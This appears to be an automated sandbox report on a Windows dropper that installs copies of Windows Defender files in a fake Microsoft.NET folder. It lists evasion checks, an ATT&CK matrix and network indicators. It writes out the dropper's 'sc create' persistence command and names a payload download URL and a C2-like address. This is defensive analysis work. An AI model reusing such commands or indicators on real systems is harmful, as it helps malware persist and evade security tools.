Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpRtp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\RedistList\OfflineScannerShell.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\RedistList\EppManifest.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\OfflineScannerShell.exe.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\MsMpRes.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\EppManifest.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\endpointdlp.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\ProtectionManagement.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\shellext.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpCmdRun.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\MpAsDesc.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpAzSubmit.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\MpAsDesc.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\ContentPack\BumpFiles.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MsMpRes.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\RedistList\MsMpLics.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\MpEvMsg.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpDetoursCopyAccelerator.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpOAV.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\shellext.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpDlpCmd.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\MsMpRes.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpEvMsg.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpDetours.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\EppManifest.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\MpEvMsg.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpProvider.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpCommu.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MsMpLics.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpCopyAccelerator.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\ProtectionManagement.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\RedistList\MpCmdRun.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\en-US\ProtectionManagement.dll.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpAsDesc.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MsMpCom.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MsMpEng.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\MpClient.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\pt-BR\OfflineScannerShell.exe.mui	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\shellext.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\NisSrv.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll	Jump to dropped file

Source: C:\Users\user\Desktop\0219830219301290321012notas.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_0-13000

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 7256	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 7272	Thread sleep count: 1811 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 7272	Thread sleep count: 1004 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe TID: 7212	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Code function: 0_2_00D55564 FindFirstFileExW,	0_2_00D55564
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 4_2_0040D3E4 FindFirstFileW,FindClose,	4_2_0040D3E4
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 4_2_0040CE18 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	4_2_0040CE18
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 7_2_0040D3E4 FindFirstFileW,FindClose,	7_2_0040D3E4
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: 7_2_0040CE18 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,	7_2_0040CE18

Source: C:\Users\user\Desktop\0219830219301290321012notas.exe

Code function: 0_2_00D49ED6 VirtualQuery,GetSystemInfo,

0_2_00D49ED6

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: DefenderCSP.dll.7.dr	Binary or memory string: 3(%lsMicrosoft HvVMwareVMware
Source: DefenderCSP.dll.7.dr	Binary or memory string: DefenderDetectionsNameURLSeverityCategoryCurrentStatusExecutionStatusInitialDetectionTimeLastThreatStatusChangeTimeNumberOfDetectionsHealthProductStatusComputerStateDefenderEnabledRtpEnabledNisEnabledQuickScanOverdueFullScanOverdueSignatureOutOfDateRebootRequiredFullScanRequiredEngineVersionSignatureVersionDefenderVersionQuickScanTimeFullScanTimeQuickScanSigVersionFullScanSigVersionTamperProtectionEnabledIsVirtualMachineConfigurationDeviceControlPolicyGroupsGroupDataPolicyRulesRuleDataTamperProtectionEnableFileHashComputationMeteredConnectionUpdatesSupportLogLocationExcludedIpAddressesAllowNetworkProtectionOnWinServerDisableCpuThrottleOnIdleScansDisableLocalAdminMergeSchedulerRandomizationTimeDisableTlsParsingDisableHttpParsingDisableDnsParsingDisableDnsOverTcpParsingDisableSshParsingPlatformUpdatesChannelEngineUpdatesChannelSecurityIntelligenceUpdatesChannelDisableGradualReleaseAllowNetworkProtectionDownLevelEnableDnsSinkholeDisableInboundConnectionFilteringDisableRdpParsingAllowDatagramProcessingOnWinServerDisableNetworkProtectionPerfTelemetryHideExclusionsFromLocalAdminsThrottleForScheduledScanOnlyASROnlyPerRuleExclusionsDataDuplicationDirectoryDataDuplicationRemoteLocationDisableFtpParsingDeviceControlEnabledDefaultEnforcementAllowSwitchToAsyncInspectionScanUpdateSignatureOfflineScanRollbackPlatformRollbackEngineNULL
Source: ProtectionManagement.dll.7.dr	Binary or memory string: Microsoft HvVMwareVMware
Source: BumpFiles.exe, 00000007.00000003.1448611101.0000000002F15000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000003.1448611101.0000000002F79000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000002.2609950296.0000000002F79000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000002.2609950296.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: ProtectionManagement.dll.7.dr	Binary or memory string: VMwareVMware
Source: BumpFiles.exe, 00000007.00000003.1448611101.0000000002F15000.00000004.00000020.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000002.2609950296.0000000002F01000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh
Source: ProtectionManagement.mfl0.7.dr	Binary or memory string: quina virtual") : Amended ToSubclass] boolean IsVirtualMachine;

Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	API call chain: ExitProcess graph end node			graph_4-10999
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	API call chain: ExitProcess graph end node			graph_7-11570

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe

Code function: 3_2_00007FFB4B1C14B5 rdtsc

3_2_00007FFB4B1C14B5

Source: C:\Users\user\Desktop\0219830219301290321012notas.exe

Code function: 0_2_00D4A2FF IsDebuggerPresent,OutputDebugStringW,

0_2_00D4A2FF

Source: C:\Users\user\Desktop\0219830219301290321012notas.exe

Code function: 0_2_00D47326 SetDefaultDllDirectories,LoadLibraryW,GetProcAddress,CoInitialize,InitCommonControlsEx,GetModuleHandleW,GetModuleFileNameW,

0_2_00D47326

Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Code function: 0_2_00D552EB mov eax, dword ptr fs:[00000030h]		0_2_00D552EB
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Code function: 0_2_00D51584 mov eax, dword ptr fs:[00000030h]		0_2_00D51584

Source: C:\Users\user\Desktop\0219830219301290321012notas.exe

Code function: 0_2_00D56580 GetProcessHeap,

0_2_00D56580

Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Code function: 0_2_00D4A3EF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00D4A3EF
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Code function: 0_2_00D4DED4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00D4DED4
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Code function: 0_2_00D4AE25 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00D4AE25
Source: C:\Users\user\Desktop\0219830219301290321012notas.exe	Code function: 0_2_00D4AFBB SetUnhandledExceptionFilter,	0_2_00D4AFBB

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	File created: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe			Jump to dropped file
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	File created: C:\Program Files (x86)\Microsoft.NET\MsMpEng.exe			Jump to dropped file

Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe

Code function: 4_2_00633718 ShellExecuteExW,WaitForSingleObject,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,

4_2_00633718

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Process created: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe "C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe" --squirrel-firstrun	Jump to behavior
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\sc.exe sc create WdCmdSvc binPath= "C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe" start= auto	Jump to behavior

Source: C:\Users\user\Desktop\0219830219301290321012notas.exe

Code function: 0_2_00D4AC7E cpuid

0_2_00D4AC7E

Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	4_2_0040D51C
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	4_2_0040C9BC
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: GetUserDefaultUILanguage,GetLocaleInfoW,	7_2_0040D51C
Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	Code function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	7_2_0040C9BC

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Queries volume information: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ComponentModel.DataAnnotations\v4.0_4.0.0.0__31bf3856ad364e35\System.ComponentModel.DataAnnotations.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\0219830219301290321012notas.exe

Code function: 0_2_00D4B06B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_00D4B06B

Source: C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe

Code function: 4_2_0040F148 GetVersion,

4_2_0040F148

Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: BumpFiles.exe, BumpFiles.exe, 00000007.00000002.2617404408.00000000048CA000.00000004.00001000.00020000.00000000.sdmp, BumpFiles.exe, 00000007.00000002.2617404408.00000000049A1000.00000004.00001000.00020000.00000000.sdmp, fuge.zip1.7.dr

Binary or memory string: MsMpEng.exe

Source: C:\Users\user\Desktop\0219830219301290321012notas.exe

Code function: 0_2_00D412B1 __ehhandler$??1_Scoped_lock@?$SafeRWList@UListEntry@details@Concurrency@@VNoCount@CollectionTypes@23@V_ReaderWriterLock@23@@details@Concurrency@@QAE@XZ,

0_2_00D412B1

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	12 Native API	1 DLL Side-Loading	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	2 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	3 Command and Scripting Interpreter	2 Windows Service	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	Data from Removable Media	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Service Execution	1 Registry Run Keys / Startup Folder	2 Windows Service	2 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	11 Process Injection	1 Software Packing	NTDS	35 System Information Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Registry Run Keys / Startup Folder	1 Timestomp	LSA Secrets	1 Query Registry	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	41 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Masquerading	DCSync	1 Process Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	31 Virtualization/Sandbox Evasion	Proc Filesystem	31 Virtualization/Sandbox Evasion	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
0219830219301290321012notas.exe	16%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner
C:\Program Files (x86)\Microsoft.NET\MpClient.dll	100%	Joe Sandbox ML
C:\Program Files (x86)\Microsoft.NET\AMMonitoringProvider.dll	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\ConfigSecurityPolicy.exe	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\DefenderCSP.dll	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\EppManifest.dll	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\MpAsDesc.dll	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\MpAzSubmit.dll	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\MpCmdRun.exe	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\MpCommu.dll	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\MpCopyAccelerator.exe	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\MpDetours.dll	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\MpDetoursCopyAccelerator.dll	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\MpDlpCmd.exe	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\MpEvMsg.dll	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\MpOAV.dll	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\MpProvider.dll	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\MpRtp.dll	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\MpSvc.dll	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\MsMpCom.dll	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\MsMpEng.exe	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\MsMpLics.dll	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\MsMpRes.dll	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\NisSrv.exe	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\ProtectionManagement.dll	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\RedistList\EppManifest.dll	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\RedistList\MpCmdRun.exe	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\RedistList\MsMpLics.dll	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\RedistList\OfflineScannerShell.exe	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\en-US\EppManifest.dll.mui	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\en-US\MpAsDesc.dll.mui	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\en-US\MpEvMsg.dll.mui	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\en-US\MsMpRes.dll.mui	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\en-US\OfflineScannerShell.exe.mui	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\en-US\ProtectionManagement.dll.mui	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\en-US\shellext.dll.mui	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\endpointdlp.dll	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\pt-BR\EppManifest.dll.mui	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\pt-BR\MpAsDesc.dll.mui	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\pt-BR\MpEvMsg.dll.mui	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\pt-BR\MsMpRes.dll.mui	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\pt-BR\OfflineScannerShell.exe.mui	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\pt-BR\ProtectionManagement.dll.mui	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\pt-BR\shellext.dll.mui	0%	ReversingLabs
C:\Program Files (x86)\Microsoft.NET\shellext.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\ContentPack\BumpFiles.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\ContentPack\Update.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\ContentPack\app-1.0.0\vcruntime140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\SquirrelTemp\Update.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
http://defaultcontainer/ContentPack.nuspec	0%	Avira URL Cloud	safe
http://defaultcontainer/tempfiles/sample.bsdiff	0%	Avira URL Cloud	safe
http://defaultcontainer/tempfiles/sample.nuspec	0%	Avira URL Cloud	safe
http://defaultcontainer/lib/net48/vcruntime140.dll	0%	Avira URL Cloud	safe
http://defaultcontainer/tempfiles/sample.diff	0%	Avira URL Cloud	safe
http://defaultcontainer/tempfiles/sample.exe	0%	Avira URL Cloud	safe
http://defaultcontainer/_rels/.rels	0%	Avira URL Cloud	safe
http://defaultcontainer/tempfiles/sample.dll	0%	Avira URL Cloud	safe
http://defaultcontainer/package/services/metadata/core-properties/63bdd4d7088c4a4c9e28aeaec7dfa81d.p	0%	Avira URL Cloud	safe
http://defaultcontainer/tempfiles/sample.rels	0%	Avira URL Cloud	safe
http://20.201.117.220/sab3/HMlmsowpmT.php?a=	0%	Avira URL Cloud	safe
http://defaultcontainer/lib/net48/BumpFiles_ExecutionStub.exe	0%	Avira URL Cloud	safe
http://defaultcontainer/tempfiles/sample.shasum	0%	Avira URL Cloud	safe
http://defaultcontainer/lib/net48/BumpFiles.exe	0%	Avira URL Cloud	safe
http://defaultcontainer/lib/net48/MpSvc.dll	0%	Avira URL Cloud	safe
http://defaultcontainer/tempfiles/sample.psmdcp	0%	Avira URL Cloud	safe
http://schemas.openxmlformats.or	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
s3-r-w.sa-east-1.amazonaws.com	3.5.234.1	true	false		high
awsserver903203232.s3.sa-east-1.amazonaws.com	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://awsserver903203232.s3.sa-east-1.amazonaws.com/webTc.zip	false		high

URLs from Memory and Binaries

